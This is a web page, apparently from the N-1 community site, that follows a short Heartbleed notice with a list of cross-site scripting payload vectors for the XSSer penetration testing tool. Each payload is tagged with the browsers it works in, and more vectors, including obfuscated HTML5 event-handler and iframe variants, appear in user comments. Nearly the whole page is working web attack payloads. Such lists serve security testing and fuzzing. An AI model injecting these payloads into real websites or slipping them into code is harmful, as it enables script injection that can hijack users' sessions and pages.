N-1

Iniciar sesión

Recien migrada!

Recientemente se ha descubierto un bug en OpenSSL muy chungo que afecta a todo Internet, el Heart Bleed bug. Por suerte, N-1 no ha estado afectado porque tiene una versión más antigua de OpenSSL. De todas maneras recomendamos que cambies las contraseñas del correo y otros servicios que utilizes.

Recently a very terrible OpenSSL bug has been discovered that affects all Internet, the Heart Bleed bug. Fortunately, N-1 has not been affected because it has an older version of OpenSSL. Anyway we recommend that you change your email password and the passwords of the other services you are using.

XSSer valid payload vectors

XSSer Fuzzing vectors (included on /fuzzing/vectors.py):

**note: add your own.

---------------

IE7.0   Vector works in Internet Explorer 7.0. Most recently tested with Internet Explorer 7.0.5700.6 RC1, Windows XP Professional SP2.  
IE6.0   Vector works in Internet Explorer. Most recently tested with Internet Explorer 6.0.28.1.1106CO, SP2 on Windows 2000.  
NS8.1-IE   Vector works in Netscape 8.1+ in IE rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional. This used to be called trusted mode, but Netscape has changed it's security model away from the trusted/untrusted model and has opted towards Gecko as a default and IE as an option.  
NS8.1-G   Vector works in Netscape 8.1+ in the Gecko rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional  
FF2.0   Vector works in Mozilla's Gecko rendering engine, used by Firefox. Most recently tested with Firefox 2.0.0.2 on Windows XP Professional.  
O9.02   Vector works in Opera. Most recently tested with Opera 9.02, Build 8586 on Windows XP Professional  
NS4   Vector works in older versions of Netscape 4.0 - untest  

---------------

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


><img src=x onerror=alert(XSS);>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

;!--"<XSS>=&{()}"
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<IMG SRC="javascript:alert('XSS');">

[IE6.0|NS8.1-IE] [O9.02]


<IMG SRC=javascript:alert('XSS')>
[IE6.0|NS8.1-IE] [O9.02]

       
<IMG SRC=JaVaScRiPt:alert('XSS')>
[IE6.0|NS8.1-IE] [O9.02]


<IMG SRC=javascript:alert(&quot;XSS&quot;)>
[IE6.0|NS8.1-IE] [O9.02]


<IMG SRC=`javascript:alert("'XSS'")`>
[IE6.0|NS8.1-IE]

       
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<IMG SRC="jav   ascript:alert('XSS');">
[IE6.0|NS8.1-IE] [O9.02]


<IMG SRC="jav&#x09;ascript:alert('XSS');">
[IE6.0|NS8.1-IE] [O9.02]
       

<IMG SRC="jav&#x0A;ascript:alert('XSS');">
[IE6.0|NS8.1-IE] [O9.02]


<IMG SRC="jav&#x0D;ascript:alert('XSS');">

[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
[IE7.0|IE6.0|NS8.1-IE]
       

<IMG SRC=" &#14;  javascript:alert('XSS');">
[IE6.0|NS8.1-IE]
       

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[NS8.1-G|FF2.0]
       

<<SCRIPT>alert("XSS");//<</SCRIPT>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


\";alert('XSS');//
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<IMG SRC='javascript:alert('XSS')

[IE6.0|NS8.1-IE] [O9.02]


 <SCRIPT>alert(/XSS/.source)</SCRIPT>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<BODY BACKGROUND="javascript:alert('XSS')">

[IE6.0|NS8.1-IE] [O9.02]


</TITLE><SCRIPT>alert("XSS");</SCRIPT>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
[IE6.0|NS8.1-IE] [O9.02]


<BODY ONLOAD=alert('XSS')>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<IMG DYNSRC="javascript:alert('XSS')">
[IE6.0|NS8.1-IE]


<IMG LOWSRC="javascript:alert('XSS')">

[IE6.0|NS8.1-IE]


<BGSOUND SRC="javascript:alert('XSS');">
[O9.02]


<BR SIZE="&{alert('XSS')}">
[NS4]


<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
[IE6.0|NS8.1-IE] [O9.02]


<IMG SRC='vbscript:msgbox("XSS")'>
[IE6.0|NS8.1-IE]
    

<IMG SRC="mocha:[XSS]">
[NS4]


<IMG SRC="livescript:[XSS]">
[NS4]


<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<TABLE BACKGROUND="javascript:alert('XSS')">

[IE6.0|NS8.1-IE] [O9.02]


<TABLE><TD BACKGROUND="javascript:alert('XSS')">
[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<DIV STYLE="background-image: url(javascript:alert('XSS'))">
[IE6.0|NS8.1-IE]

       
<DIV STYLE="width: expression(alert('XSS'));">
[IE7.0|IE6.0|NS8.1-IE]


<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<TABLE BACKGROUND="javascript:alert('XSS')">
[IE6.0|NS8.1-IE] [O9.02]

   
<TABLE><TD BACKGROUND="javascript:alert('XSS')">"
[IE6.0|NS8.1-IE] [O9.02]
       
       
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
[IE6.0|NS8.1-IE]


<DIV STYLE="width: expression(alert('XSS'));">
[IE7.0|IE6.0|NS8.1-IE]
       

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
[IE6.0|NS8.1-IE]


<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
[IE7.0|IE6.0|NS8.1-IE]

      
<XSS STYLE="xss:expression(alert('XSS'))">
[IE7.0|IE6.0|NS8.1-IE]

 
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
[NS4]


<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
[IE6.0|NS8.1-IE]

   
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
[IE6.0|NS8.1-IE]

       
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
[IE7.0|IE6.0|NS8.1-IE]


<BASE HREF="javascript:alert('XSS');//">
[IE6.0|NS8.1-IE]


<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
[O9.02]

   
a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

       
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X><xml><SPAN DATASRC=#I DATAFLD=CDATAFORMATAS=HTML></SPAN>
[IE6.0|NS8.1-IE]

       
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
[IE6.0|NS8.1-IE]


<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
[IE6.0|NS8.1-IE]


<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
[IE7.0|IE6.0|NS8.1-IE]

   
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

       
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Comentarios

    • psy
      psy

      <SCRIPT SRC=http://127.0.0.1></SCRIPT>
      [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
      [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
      [IE6.0|NS8.1-IE] [O9.02]

      <IMG SRC="&14;javascript:alert('XSS');">
      [IE6.0|NS8.1-IE] [O9.02]
         
      <SCRIPT <B>=alert('XSS');"></SCRIPT>
      [IE6.0|NS8.1-IE] [O9.02]    

      <IFRAME SRC="javascript:alert('XSS'); <
      [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <SCRIPT>a=/XSS/nalert('XSS');</SCRIPT>
      [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <LAYER SRC="javascript:alert('XSS');></LAYER>
      [NS4]
         
      <STYLE>li {list-style-image: url("javascript:alert('XSS');</STYLE><UL><LI>XSS
      [IE6.0|NS8.1-IE]

      <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'));">
      [IE6.0|NS8.1-IE]
             
      <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
      [IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <a href="javascript#alert('XSS');">
      [IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <div onmouseover="alert('XSS');">,
      [IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <input type="image" dynsrc="javascript:alert('XSS');">
      [IE6.0|NS8.1-IE] [O9.02]

      &<script>alert('XSS');</script>">
      [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      &{alert('XSS');};
      [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <IMG SRC=&{alert('XSS');};>
      [IE6.0|NS8.1-IE] [O9.02]

      <a href="about:<script>alert('XSS');</script>">
      [IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <DIV STYLE="binding: url(javascript:alert('XSS'));">
      [IE6.0|NS8.1-IE]

      <OBJECT classid=clsid:..." codebase="javascript:alert('XSS');">
      [O9.02]

      <style><!--</style><script>alert('XSS');//--></script>
      [IE6.0|NS8.1-IE]

      ![CDATA[<!--]]<script>alert('XSS');//--></script>
      [IE6.0|NS8.1-IE]

      <!-- -- --><script>alert('XSS');</script><!-- -- -->
      [Not Verified]

      <img src="blah"onmouseover="alert('XSS');">
      [IE6.0|NS8.1-IE] [O9.02]

      <img src="blah>"onmouseover="alert('XSS');">
      [IE6.0|NS8.1-IE] [O9.02]
             
      <xml id="X"><a><b><script>alert('XSS');</script>;<b></a></xml>
      [IE6.0|NS8.1-IE]

      <div datafld="b" dataformatas="html" datasrc="#XSS"></div>
      [Not Verified]

      [\xC0][\xBC]script>alert('XSS');[\xC0][\xBC]/script>
      [Not Verified]

      <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:alert('XSS');">]]</C><X></xml>
      [IE6.0|NS8.1-IE]

      • psy
        psy

        html 5 formaction

        <form id="test" /><button form="test" formaction="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">X

        html 5 autofocus

        <input onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>

        <select onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>

        <textarea onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>

        <keygen
        onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>

        html 5 autofocus race

        <input onblur=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><input autofocus>

        html 5 poster

        <video poster=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))//

        html 5 onscroll event + autofocus

        <body onscroll=eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

        html 5 onforminput

        Please input something to trigger the test<form id=test onforminput=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))><input></form>

        html 5 onformchange

        Please input something to trigger the test<form id=test><input></form><button form=test onformchange==javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))>X

        html 5 video source

        <video><source onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">

        html 5 video onerror with source tag

        <video onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))"><source>

        • psy
          psy

          more iframe valid vectors:

          <iframe/ /onload=alert(/XSS/)></iframe>
          <iframe/ "onload=alert(/XSS/)></iframe>
          <iframe///////onload=alert(/XSS/)></iframe>
          <iframe "onload=alert(/XSS/)></iframe>
          <iframe<?php echo chr(11)?> onload=alert(/XSS/)></iframe>
          <iframe<?php echo chr(12)?> onload=alert(/XSS/)></iframe>

        XSSer

        XSSer

        XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.